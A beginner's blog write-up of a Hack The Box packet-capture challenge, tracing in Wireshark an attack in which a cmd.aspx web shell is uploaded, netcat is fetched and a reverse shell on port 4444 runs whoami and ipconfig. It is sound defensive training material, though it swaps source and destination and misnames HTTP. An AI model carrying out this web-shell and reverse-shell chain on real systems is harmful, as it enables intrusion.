It has been a while since I have had some spare time to do a PCAP (packet capture) analysis in Wireshark, so I decided to get on Hack The Box this weekend to get some practice navigating wireshark and analyzing a PCAP.
Getting Started: Wireshark Download and McAffee Active Scan Disabled
Getting started I headed to https://www.wireshark.org/ to download Wireshark to be able to open the PCAP in Wireshark. Also, I had to disable my McAffee antivirus active scanner because although I was able to download the file, when I tried to open the Chase PCAP, McAffee kept quarantining the file as malicious. After putting the active scanner on pause for 15 minutes I was able to begin the analysis of the pcap.
Time to Follow the Trail of Bread Crumbs!
Now that all of that is settled, let the fun begin! The first thing I noticed when examining the packet capture was how relatively small it was compared to some of the PCAPS we looked at during my time in the cybersecurity boot camp at Fullstack Academy. In total there were only 216 packets captured however there was still a lot going on here.
The next few key points I noticed were the two ip addresses of 22.22.22.5 which is the source address where the requests are being made to and the destination address 22.22.22.7 which is the destination address making the requests and receiving the requests from the source address. Then there were two main protocols two focus on which were TCP (Transmission Control Protocol) and HTTP (Hypertext Transport Protocol)
The first three packets began with what is called a TCP handshake where the destination address known as the client synchronizes (syn) with the source ip address known as the server, then the source ip address (server) in response synchronizes and acknowledges (SYN ACK) the client’s request to synchronize. Finally the destination address (client) in response acknowledges (ACK) the source address (server) response of synchronization and acknowledgement. If this was a normal converstion if would look something like; Client: “Hey, can you hear me?” Server: “Hey, I can hear you. Can you hear me?” Client: “Yes, let’s chat!”
Packet Filtering by HTTP Requests
Following the TCP handshake where the connection between the server and client is established there were several HTTP requests made so I took a look at the HTTP stream in Wireshark and found some interesting stuff. In order to make the HTTP request more easily viewable and digestible I filtered the packets by HTTP.
In packet nine the get request looks to be navigating the home page with a welcome image on the webpage. Next it looks like the user navigates to an upload page on the site in packet 18. In packet 23 there was a post request to the upload page. Here it looks like the user uploaded the file cmd.aspx as Admin. Then I googled the code and it came back showing that this allows remote code execution through a web shell.
After getting a web shell the attacker downloads netcat so it is obvious the intention is likely to get a reverse shell. This begins at packet 37 where the post cmd.aspx is discovered with the command to download netcat and the path of the download.
At packet 141 there is evidence that netcat was ran with a reverse shell connecting to the server at 22.22.22.7 on port 4444.
After the netcat connection was established I took a look at the tcp stream to see what commands were ran. As seen below the whoami, ipconfig are ran followed by a failed request to download a .txt file and the a subsequent successful download right after.
Finally following the tcp stream at packet 210 the content of the .txt file says “Hey there!”
That .txt file sure does look like it is encoded. I will put it through cyberchef. YES, LETS GO CHALLENGE COMPLETE! :D
In conclusion, that was quite the challenge. Someone warned me that HackTheBox is for more intermediate to advanced users. I am finding that out the hard way even though this is listed as easy and intro to blue team on HackTheBox. Although I enjoy the challenge I am beginning to wonder if it will be better to continue my learning journey on TryHackMe instead until I become more advance at defensive and offensive methods. Regardless this was an awesome challenge and I had a lot of fun learning and working towards solving this PCAP challenge.
Thanks for stopping by and checking out this latest entry.
Zer0rigin
